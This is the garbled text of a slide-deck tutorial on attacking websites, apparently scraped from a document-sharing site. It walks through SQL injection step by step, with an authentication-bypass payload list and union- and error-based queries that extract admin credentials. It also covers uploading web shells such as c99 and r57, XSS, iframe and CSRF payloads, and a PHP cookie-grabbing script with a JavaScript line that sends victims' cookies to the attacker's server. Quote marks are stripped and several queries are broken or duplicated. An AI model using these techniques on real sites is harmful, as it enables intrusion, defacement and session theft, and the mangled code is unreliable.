Web Security

Web Security
Session Flow
Web Architecture
Security Misconceptions
Latest Threats on Web
SQL Basics
SQL Injection Authentication Bypass
SQL Injection Union Based
SQL Injection Error Based
Control Panel
Session Flow
Uploading Control Panel

Privilege Escalation on Server
Analyzing Logs
XSS
Session Hi-jacking
Web Architecture
Web Architecture is nothing but a simple client-server model.
All the users of the internet are clients and the web pages
which they are viewing are on the Web Server.
Web Server contains one or more than one websites on it.
Web Architecture
Client requests the server for the web page and as the
response of it, server sends the appropriate data.
It seems very simple but to in real our request has to pass
from many servers and if the response is positive only then it
gets the page.
Different types of server:
Application Server
Backup Server
Mail Server
DB Server
File Sharing & Printing Server Web Server
Etc, etc, etc
Etc, etc, etc
The Firewall protects my web server and database
Access to the server through ports 80 and 443 makes the web
server part of your external perimeter defense.
Vulnerabilities in the web server software or web applications
may allow access to internal network resources.
The IDS & IPS protects my web server and database
The IDS is configured to detect signatures of various wellknown attacks.
Attack signatures do not include those for attacks against
custom applications.
It keeps the log of the events and all the actions performed by
users which is practically not possible to monitor.
SSL secures the website
SSL secures the transport of data between the web server and
the users browser.
SSL does not protect against attacks against the server and
applications.
SSL is the hackers best friend due to the false sense of
security.
Latest Threats
SQL Injection
Cross-Site Scripting (XSS)
Broken Authentication and Session Management
Insecure Direct Object References
Cross-Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards
SQL Basics
SQL : Sql stands for the Structured Query Language.
It is meant for the communication between database and
application.
SQL Basics
We can use default statements of SQL for the data
manipulation.
SELECT Statement
INSERT INTO Statement
UPDATE Statement
DELETE Statement
All the four statements

are a part of
SQL DML
Data Manipulation
Language
SQL Basics
SQL allows one to perform various operations on tables, i.e. to
define data structure.
CREATE TABLE
ALTER TABLE
DROP TABLE
DELETE TABLE
All these operations are a part

of
SQL- DDL
SQL Data Definition Language
SQL Basics
Select Statement is used to select data from the table.
Insert into Statement is used to insert data into already
created table.
Update Statement is used to update the data of column from
the table.
Delete Statement is used to delete the data from column.
SQL Basics
Sample Database
Here, Four Columns,

> ID
> News Title
> News Contents
> News Author
Are in News Table.
Database Name is
NewsDB
SQL Basics
Sample Database
The sample database name is : NewsDB
It contains one table : News
Four columns are :
ID
NewsTitle
NewsContent,
NewsAuthor
SQL Basics
Sample Queries
Query : Select * from news;
The execution of this query will return all the data from news table.
Query : Select news_content from news;

The execution of this query will return all the data of news content column
from news table.
Query : Select news_content,news_title from news;

The execution of this query will return all the data of news content and
news title column from news table.
SQL Basics
Sample Queries
Query : Select news_content,news_title from news where
ID=3;
The execution of this query will return only that data of news content and
news title column from news table where ID columns value is 3.
Query : Select * from news where ID=3;

The execution of this query will return all data from news table where ID
columns value is 3.
SQL Basics
Sample Scenario
There is a website, site.com
The website is nothing but a group of more than one web
pages,
and
One
page
of
the
website
is,
www.site.com/adminlogin.php
We can assume the details behind the code is,
Database
Table Name
adminlogin Columns
: SiteDB
: userlogin, adminlogin, news, etc
: adminid, pass
SQL Basics
To login to the adminlogin.php page, whenever the admin will
enter the adminid and password, a query will executed on
adminlogin table, the query will look somewhat like,
select * from adminlogin where adminid=<value> and
pass=<value>;
i.e. : select * from adminlogin where adminid=admin and
pass=adminpass;
If the username and password are correct then admin will be
able to login with the username admin and password
adminpass
SQL Injection
SQL Injection is a method of injecting SQL queries into the
website, by injecting our malicious queries hacker can easily,
Bypass the authentication
Grab the Structure of the database
Grab the sensitive data
Basically we will divide our SQL injection Methods into

different parts,
Authentication Bypass
Union Based Injection
Error Based Injection
Sample Scenario
There is a website, site.com
The website is nothing but a group of more than one web
pages,
and
One
page
of
the
website
is,
www.site.com/adminlogin.php
We can assume the details behind the code is,
Database
Table Name
adminlogin Columns
: SiteDB
: userlogin, adminlogin, news, etc
: adminid, pass
To login to the adminlogin.php page, whenever the admin will
enter the adminid and password, a query will executed on
adminlogin table, the query will look somewhat like,
select * from adminlogin where adminid=<value> and pass=<value>;
i.e. : select * from adminlogin where adminid=admin and

pass=adminpass;
If the username and password are correct then admin will be

able to login with the username admin and password
adminpass otherwise it will give negative response and as a
result you could see and error, Invalid username and
password.
But what if some one is passing or0=0 as password ???
The query would be,
select * from adminlogin where adminid=admin and
pass=or0=0 ;
What ever we will pass as value, it will be passed between
two single quotes, i.e. : <value>
There was already one single quote and by applying our

malicious string we are giving it another single quote. So, one
starting single quote and one ending single quote.
The query will be divided into two parts,
select * from adminlogin where adminid=admin
pass=or0=0;
Here, the condition 0=0 will result positively
authentication will be bypassed !
We can try to put the same or0=0 as the username
password if needed.
It is to be understood that we can replace 0 with 1,X
i.e. : or1=1
orX=X
As per the surveys, still more than 65% websites
vulnerable with this injection.
and
and
and
are
Sample Keywords
or 1'=1
or x='x
or 0=0
or 0=0
or 0=0
or 0=0 #
or 0=0 #
or 0=0 #
or x='x
or x=x
) or (x='x
or 1=1
or 1=1
or 1=1
or a=a
or a=a
) or (a='a
) or (a=a
hi or a=a
hi or 1=1
hi or 1=1
or1=1'

As a part of Authentication Bypass, we were guessing the
name as admin or administrator or we used to pass our
malicious string in both username and password. But all the
time username cannot be admin or administrator, and even
authentication bypass vulnerability can be solved also, so in
that case if a hacker wants to hack into those websites then
hacker has to fetch the data from the database.
To fetch the data from the database this, union based
injection can be useful. A hacker will be passing the malicious
query along with the normal query of the website.
Union Based injection reveals sensitive data from the
database.
Web Application requests data from the database, as the

response of that request, Database gives the proper data
according to the query.
But A Hacker can insert the malicious query with the actual
query and can get the sensitive information from the
database.

Union based injection consists some core statements and
keywords of SQL. Some basics of SQL is needed once again.
SQL Basics
Information_schema: Information Schema is the information
database, the place that stores information about all the
other databases that the MySQL server maintains. We can
access the information by using its objects tables and
columns.
information_schema.tables : It contains all the information
about the tables.

Information_schema.columns :
information about the columns.
It
contains
all
the
Union Operator: The UNION operator is used to combine the

result-set of two or more SELECT statements.
It is used to combine the data but it will not repeat the
same data. i.e.
a = {1,2,3,4}
b = {1,2,3,4,5,6,7}
a U b = {1,2,3,4,5,6,7} || a UNION b means, it fetched all
the data but data repetition is avoided.

Bollywood
Hollywood
E_ID
E_Name
E_ID
E_Name
1
2
3
Vidit Baxi
Shahrukh Khan
John Abraham
1
2
3
Vidit Baxi
Jim Carrey
Daniel Craig
Now we want to list all the different actors from bollywood and
hollywood, we use the following SELECT statement:
E_Name
E.g.: SELECT E_Name FROM Bollywood
Vidit Baxi
UNION
Shahrukh Khan
SELECT E_Name FROM Hollywood
John Abraham
The result-set will look like this:
Jim Carrey
Daniel Craig
The ORDER BY Keyword : The ORDER BY keyword is used to sort the result-
set by a specified column.

The ORDER BY keyword sort the records in ascending order by default.
If you want to sort the records in a descending order, you can use the
DESC keyword.
Bollywood
E_ID
2
1
4
3
E_Name
John Abraham
Vidit Baxi
Shahrukh Khan
Shahid Kapoor
E.g. : select * from Bollywood ORDER BY E_ID;

Result-Set will look like this :
E_Name
Vidit Baxi
John Abraham
Shahid Kapoor
Shahrukh Khan

Hackers are hacking into the websites by following some steps
as explained as below.
Step:1 Find something=something in url, i.e. : id=4, page=2,
catid=1, info=9, product=car
http://www.site.com/product.php?id=4
http://www.site1.com/list.php?catid=3
http://www.site2.com/product.php?product=car
because these links are fetching data from the database
and with this link hacker can pass the malicious query.

After finding something=something, Apply (Single Quote),
it will look somewhat like,
http://www.site.com/product.php?id=4
http://www.site1.com/list.php?catid=3
http://www.site2.com/product.php?product=car
If it is
generating an error or
showing the blank page or
you can see some data missing
then it may be vulnerable with the union based sql
injection.
Union Based
Blank Page

Step:2 order by 1 -- (Remove )
i.e.:
http://www.site.com/product.php?id=4 order by 1 -http://www.site1.com/list.php?catid=3 order by 1 -http://www.site2.com/product.php?product=car order

by 1 --
If the page is loading normally, you need to proceed to order

by 2 - Then order by 3 -- up till you see some error or blank page or
data missing.

Here, -- is beginning of comments, so if in case developer is
passing any query then it becomes comments so it wont get
executed.
Order by 1 -- || Normal Load
Order by 5 -- || Error
That means there are 4 columns which contains the data.

Normal Load

order by 1 --

order by 2 --

order by 3 --

order by 4 --

order by 5 --
Here, order by 5 -- gives error, so this error means there are 4

columns which is used to display the data.

We got the error at order by 5 that means there are 4 columns
which are fetching data from the database, now we have to union
them to see the visible column.
Step:3 union select 1,2,3,4 -Note: we got error at order by 5 so that is why it is union select 1,2,3,4, if in case we get error at 10 then it could have been
union select 1,2,3,.,9,10 --
i.e. :
http://www.site.com/product.php?id=4 union select 1,2,3,4 -http://www.site1.com/list.php?catid=3 union select 1,2,3,4

http://www.site2.com/product.php?product=car union select
1,2,3,4 --

But in case if you cannot see any visible column number then
its a view which is creating problem so we need to add - . So it
would be something like,
i.e. :
http://www.site.com/product.php?id=-4 union select 1,2,3,4 -http://www.site1.com/list.php?catid=-3 union select 1,2,3,4 -http://www.site2.com/product.php?product=-car union select
1,2,3,4 --

The visible column number is 2 so we can replace it with,
Database() : This function is used to see the name of the
database.
Version() : This function is used to see the MySQL version.
User() : This function is used to see the default user of the
database.
Table_name : table_name is used to select table names
from database.
Column_name : column_name is used to select columns
names from database. Etc etc etc

Step:4 Check version OR database OR user by applying,
union select 1,version(),3,4 -OR
union select 1,database(),3,4 -OR
union select 1,user(),3,4 --
These functions will return version of the MySQL, name of the

database and default user of the database.
i.e. : http://www.site.com/product.php?id=4 union select 1,version(),3,4 -http://www.site2.com/list.php?catid=3 union select 1,version(),3,4 -http://www.site1.com/product.php?product=car union
select1,version(),3,4 --

Version
Database

User

Step:5 To see the table names,
http://www.site.com/product.php?id=5 union select 1,2,table_name,4
from information_schema.tables --
First table name
Sometimes you may get all the table names but sometimes
you will get only the 1st table so to get all the tables names
together

You can use group_concat() to see all the data together, so our
query will become,
http://www.site.com/product.php?id=5 union select
1,2,group_concat(table_name),4 from information_schema.tables --
All the table names

You need to look for the appropriate table like, admin,
admindata, login, user, adminlogin, logindata, logininfo,
tbladmin, admintable, tbl_admin etc etc etc

Step:6 Find the column names of the table
http://www.site.com/products.php?id=5 union select
1,2,column_name,4,5 from information_schema.columns where
table_name=tbl_admin
Column Name

Sometimes single quotes () may not be allowed so you have to
convert the characters of the table name to decimal and pass it
through char().
i.e. : admin will be passed as : char(97,100,109,105,110)
here, 97 = a, 100 = d, 109 = m, 105 = i, 110 = n

table_name= char(116,97,98,108,101,95,97,100,109,105,110) --
Column name

table_name= char(116,97,98,108,101,95,97,100,109,105,110)
All columns

Step:7 Get the data from the database.
http://www.site.com/products.php?id=5 union select 1,2,adminid,4 from
admin --
User name and Password

Error Based SQL Injection is more interesting, in the Union
Based Injection we were fetching the data from the database
using information schema. And the logic behind Error Based
Injection Injection is to fetch the data from the database in
terms of the errors. We will be passing a query which cannot
be executed properly and will generate error, our aim will be
to get the data from that. Generally we use Error Based
Injection injection for the websites made in asp, aspx.
Web Application requests data from the database, as the

response of that request, Database gives the proper data
according to the query.
But A Hacker can insert the (error)query with the actual query
and can get the error data information from the database.

Step:1 Find something=something in url, i.e. : id=4, page=2,
catid=1, info=9, product=car
http://www.site.com/product.aspx?id=4
http://www.site1.com/list.php?aspx=3
http://www.site2.com/product.aspx?product=car
because these links are fetching data from the database

and with this link hacker can pass the malicious query.
Apply (Single Quote)
http://www.site.com/product.aspx?id=4
http://www.site1.com/list.php?aspx=3
http://www.site2.com/product.aspx?product=car

If it is
Generating an Error
Then it may be vulnerable with the error based sql
injection.

Normal Load

After applying single quote()
An error means, we may be able to inject our queries with it...

Step:2 Look for the table name
http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top 1
table_name from information_shema.tables)) --
Here is the query part,

and 1=convert(int,(select top 1 table_name from
information_shema.tables))
We can divide this query into 3 parts

1st part : select top 1 table_name from information_shema.tables
2nd part : convert(int,(1st part))
3rd part : and 1=(2nd part(1st part))

Here, the 1st part
select top 1 table_name from information_schema.tables
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1 points
here
This query will select 1st table from
information_schema.tables
i.e. : the selected table name is
users.

And 2nd part
convert(int,(1st part))
it will try to convert the selected table name to integer.
but character cannot be converted into integer directly so it will
generate an error (thats what we want !!! )
sometimes you get the table name like 1234. It can be converted
into the integer, so in that case we will not be able to see the error
here but still we have 3rd part for that,
and 1= convert(int,(1st part))
It will compare the converted value with 1. The conversion will not
be equal to 1 and thus it will generate an error (thats what we
want !!! )

So, here is our final logic,
Conversion is not possible so we will get the table name in the

error.

In the error, we have got the 1st table name.
l logic,
The table name is tbl-1.

To get the 2nd table name we have to edit our query with where
condition. The query would be something like,
table_name from information_schema.tables where table_name not in(tbl1')))

The main part of the query is,
where table_name not in(Table-1)
not in() is same as !=, it will put it in excluding list. So, top 1 will
point to the next table.
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1 points
here

The main part of the query is,
where table_name not in(Table-1)
not in() is same as !=, it will put it in excluding list. So, top 1 will
point to the next table.
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1, now
points here

After executing this, if we want to see the 3rd table, the query
would be like,
where table_name not in(Table-1,Table-2)
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1, now
points here

After executing this, if we want to see the 3rd table, the query
would be like,
where table_name not in(Table-1,Table-2)
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1, now
points here

In case, you find the interesting table name, the next step will be to
fetch the column names.
Step:3 Fetch the column names
column_name from information_shema.columns where
table_name=Table-1)) --
column 1
column 2
admin
Top 1 points
here
To fetch the second column, edit the query,

http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top
1 column_name from information_shema.columns where
table_name=Table-1 and column_name not in(col1))) --

column 1
column 2
Top 1 points
here
admin

column 1
column 2
Top 1, now
points here
admin
After fetching the proper table name and column names, we can
fetch the data from the tables.

Step:4 Get the Data
Col1 from Table)) -Column 1
Column 2
Data 1
Data 5
Data 2
Data 6
Data 3
Data 7
Data 4
Data 8
admin
Top 1 points
here
Control Panel
Control panels can be classified of 3 types.
Domain Control Panel Whenever one buys a domain,
Domain Provider assigns you a control panel where you can
add , edit, and delete the domain related resources like DNS ,
Sub Domain, etc.
Hosting Control Panel Whenever one buys a hosting space
to host the website, Hosting Provider assigns you a control
panel where you can add, edit and delete the pages of the
website.
Control Panel
Admin Control Panel Whenever one creates website , for
the content management , developer puts a page where one
can add, edit and delete the data.
Control Panel
After getting access of the website, a hacker will try to get
access of the admin control panel, where a hacker can add,
edit, delete and modify the data.
A White Hat Hacker may not do anything but a Black Hat
Hacker may delete the data also and even can upload another
control panel. Hackers control panel can harm not only one
website but all the websites. If hacker is able to get root
access on the server, all the websites can be defaced or the
database can be tampered.
Control Panel
Domain Control Panel
Control Panel
Hosting Control Panel
Control Panel
Admin Panel
Control Panel
Understanding the control panel is the most important part of
the web security.
A control panel comes with good number of options. One
needs to choose the appropriate option for the website.
Control Panel
Account Management contains the information about the user

account of the admin.
Domain Manager allows admin to edit the sub domain.
File Manager allows admin to upload files via online file manager or
via FTP. Admin can perform add, edit and delete operation on pages
here.
Control Panel
Statics may show you the account statics.

Hosting Provider may also provide you some software for your
website.
Sometimes, Hosting Control Panel & Domain Control Panel
are same, so in that case it will allow you to edit information
like MX records and CNAME records also.
Control Panel
Site Management will allow user to take back up and even

sometimes schedule the backup.
While registering the website, one gets email addresses. To
manage email accounts there is Email Management option.
Website may have a database, one can upload the database
and edit it using Database Management option.
Control Panel
Online File Manager
Online File Manager is used to upload the pages, Here, htdocs

is a folder which may contain all the files.
Control Panel
As a part of the Gaining Access Phase, hacker hacks into the
website, then gets the access to the control panel. But to
mention the access on the website, hacker uploads another
control panel, Hacker Control Panel.
Hacker Control Panels are same as the general control panels.
Hacker control panels are known as shell.
From the hacker control panel, Hacker can get access to the
database, upload content, execute commands on the server,
delete existing files, edit source code of the pages, and Deface
the website.
Hacker can also get the root access on the server. This may
allow hacker to hack into the other websites of the same
server.
Control Panel
Shell for windows platform and Linux platform are different.
For windows platform hackers can use,
k shell
Asp shell
Devilz shell
Etc, etc, etc
Shell for the Linux Platforms are,

b374k shell
c99 shell
r57 shell
b64 shell
Etc, etc, etc
Control Panel
b374k Shell
Control Panel
c99 Shell
Control Panel
devilz Shell
Control Panel
k Shell
Control Panel
r57 Shell

To upload the control panel on the website, hacker needs to
have access to the admin control panel.
Hacker needs to find an option to upload the data on the
website, generally news, video, image gallery is made with an
option to upload new data.
Control Panel can be uploaded from those options.

Admin Panel
Upload Option
Uploaded Content
XSS
XSS, the Cross Site Scripting.
Its a vulnerability which is found very frequently in the
websites which enables the attacker to inject the client side
scripts into the website.
The Attacker sends the vulnerable website with his malicious
script to the other user, when browser receives all the scripts,
it assumes all the scripts have come from the trusted source
and because of that victim gets compromised.
Generally this vulnerability is found in the search box, shout
box, comment box etc It can also be found by the same way
we can find SQL Injections.
XSS
Just to verify whether the website is vulnerable with the XSS
vulnerability or not, hacker can try the following script in the
search box or the comment box.
<script>alert(Vidit)</script>
or
<script>alert(Vidit)</script>
or
<script>alert(0)</script>
If the website is loading with the alert box, than the website is
vulnerable with XSS Vulnerability.
XSS
There is no single, standardized classification of cross-site
scripting flaws but primarily we can divide XSS into the 2
types.
1.
2.
Persistent XSS Vulnerability

Reflected XSS Vulnerability
1. Persistent XSS Vulnerability

When a hacker injects the malicious script into the
website, the code gets injected into the source of the
website. So each and every time when someone opens
the website, the injected code also gets executed.
XSS
2. Reflected XSS Vulnerability
When a hacker injects the malicious script into the
website, unlike the persistent one, the code is not
injected into the source of the website. It stays limited up
to the browser. In this case, hacker will send the website
link along with the malicious script to the other user, so
along with the website data, the script will also be
executed.
XSS
Sample Attacks
This client side vulnerability can be exploited in so many

ways, to make it simple in understanding, here are some
of the examples of it.
1.
2.
3.
4.
Cross Frame Scripting (XFS)

Cross Site Reference Forgery (CSRF / XSRF)
DOM Based Attack
Session Hijacking
XSS
1. Cross Frame Scripting
Cross Frame Scripting is one of the dangerous out come of the
Cross Site Scripting Vulnerability.
A Hacker can use frame script of HTML to load other
website in a frame of the vulnerable website.
The hacker may also load the pages of the same website,
i.e. Login page of the bank website
Victim checks the URL which is always found to be the
trusted and gets hacked.
Generally hackers prefer to load a phishing page in the
frame.
XSS
As an example,
<IFRAME SRC=http://www.site.com />
We can assume the site.com as the phishing page or the page of the
other website.
If a hacker is loading this script into the search box or comment

box of the website, when all the packets gets loaded it will load
also with the frame of the site.com
XSS
As per the example, A hacker can make a Pakistani

website load the page of an Indian website in frame.
<iframe src=http://www.india.gov.in/>
XSS
It was not loading properly so we can set the height and

width of the frame.
<iframe src=http://www.india.gov.in height=1000px width=1000px/>
XSS
2. Cross Site Request Forgery (CSRF/XSRF)
Cross Site Request Forgery vulnerability in any website allows
the hacker to send a page link which contains some malicious
code and can also compromise the victim data.
A Hacker can use image script of HTML to simply load any
image of the any website.
The hacker may also try to use a website link instead of
using image path, it may also hijack user session.
Victim checks the URL which is always found to be the
trusted and gets hacked.
Generally hackers prefer to load a session hijacking exploit
in the frame.
XSS
As an example,
<IMG SRC=http://www.site.com/images/image1.jpg />
This query may load the image of the site.com on the website
page.
<IMG SRC=http://www.site.com/bank/transaction.do />
This query may not load any image but it may force the user to
do the transaction if the user is already authenticated on the
website.
XSS
As per the example, A hacker can make a Pakistani website

load the image of the Indian hero.
The query would be,
XSS
And the as the result, it is loading the image of the actual hero
of the India.
XSS
The same way, a hacker can also load session hijacking or any
other malicious query along with the IMG SRC tag.
Instead of executing the image path, it may execute the

malicious query of the hacker.
XSS
3. DOM Based Attack :
DOM Based XSS (type-0 XSS) is an XSS attack wherein the

hacker executes the malicious code by modifying the DOM
environment of the victims browser used by the original client
side script,
Sometimes web developers decide to use the variables to
display the data on the page which is passed from the URL.
We can apply the same type of query in place of the value of
the variable.
Eg: http://www.site.com/page.php?id=<iframe src=http://www.india.gov.in/>
http://www.site.com/page.php?id=<img
src=http://www.india.gov.in/images/image1.jpg />
XSS
3. Session Hijacking:
Session Hijacking is one of the most dangerous vulnerability exists
in the web applications.
In general terms, A web application uses sessions to maintain

the information of the authenticated users. The session is used
every where to verify the authenticity of the user.
The hacker can grab the user session and use the same on the
same website to authenticate himself and can perform various
transactions.
XSS
Session Authentication works in a very simple way, whenever

any user logs into the website, A small client-side cookie gets
installed into the user computer. The server also keeps a
server-side cookie for the verification and validation of the
client-side cookie.
Authentication Request of the Server :
XSS
Server Responds to the Request and sends the client side

cookie. Server also keeps a server side cookie.
The hacker can grab the client side cookie of the user and can
use that to be authenticated from the server side cookie.
XSS
To grab the cookie of the authenticated user, Hacker creates a

script which can grab the cookie of the victim.
Cookie Grabbing Script coded in php.

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];
$data = "IP: " . $ip . "\n" ."Cookie: " . $cookie . "\n" ."Referrer: " . $referer . $data = "IP: " . $ip . "\n" ."Cookie: " . $cookie . "\n"
."Referrer: " . $referer .
"\n" ."Browser: " . $browser . "\n\n";
$log = "cookies.txt";
@chmod($log, 777);
$f = fopen($log, 'a');
fwrite($f, $data); fclose($f);
@header("Location: http://www.google.com");
?>
XSS
Hacker uploads this scripts on the web server and uses

javascript to grab victim cookie.
Javascript:document.location=http://www.site.com/grabber.php?cookie=.concat
(escape(document.cookie));
As per our code, the cookie will be stored into the cookies.txt
file. The session contains two variables, referrer and cookie,
the attacker needs to edit both the variables into the browser
while opening the website.
Thus the installed session of the victim will act as a client side
cookie and server side cookie will give positive response.

Web Security

Hochgeladen von

Dokumentinformationen

Originalbeschreibung:

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Web Security

Hochgeladen von

Copyright:

Verfügbare Formate

Web Security

Uploading Control Panel

All the four statements

All these operations are a part

Here, Four Columns,

Query : Select news_content from news;

Query : Select news_content,news_title from news;

Query : Select * from news where ID=3;

Basically we will divide our SQL injection Methods into

i.e. : select * from adminlogin where adminid=admin and

If the username and password are correct then admin will be

There was already one single quote and by applying our

Union Based Injection

Union Based Injection

Web Application requests data from the database, as the

Union Based Injection

Union Based Injection

Union Operator: The UNION operator is used to combine the

Union Based Injection

Union Based Injection

set by a specified column.

E.g. : select * from Bollywood ORDER BY E_ID;

Union Based Injection

Union Based Injection

Union Based Injection

http://www.site.com/product.php?id=4 order by 1 -http://www.site1.com/list.php?catid=3 order by 1 -http://www.site2.com/product.php?product=car order

If the page is loading normally, you need to proceed to order

Union Based Injection

Union Based Injection

Union Based Injection

Union Based Injection

Union Based Injection

Union Based Injection

Union Based Injection

Here, order by 5 -- gives error, so this error means there are 4

Union Based Injection

http://www.site.com/product.php?id=4 union select 1,2,3,4 -http://www.site1.com/list.php?catid=3 union select 1,2,3,4

Union Based Injection

Union Based Injection

Union Based Injection

Union Based Injection

These functions will return version of the MySQL, name of the

Union Based Injection

Union Based Injection

Union Based Injection

Union Based Injection

First table name

Union Based Injection

All the table names

Union Based Injection

Union Based Injection

Union Based Injection

Union Based Injection

Union Based Injection

Union Based Injection

User name and Password

Error Based Injection

Error Based Injection

Web Application requests data from the database, as the

Error Based Injection

because these links are fetching data from the database

Error Based Injection

Error Based Injection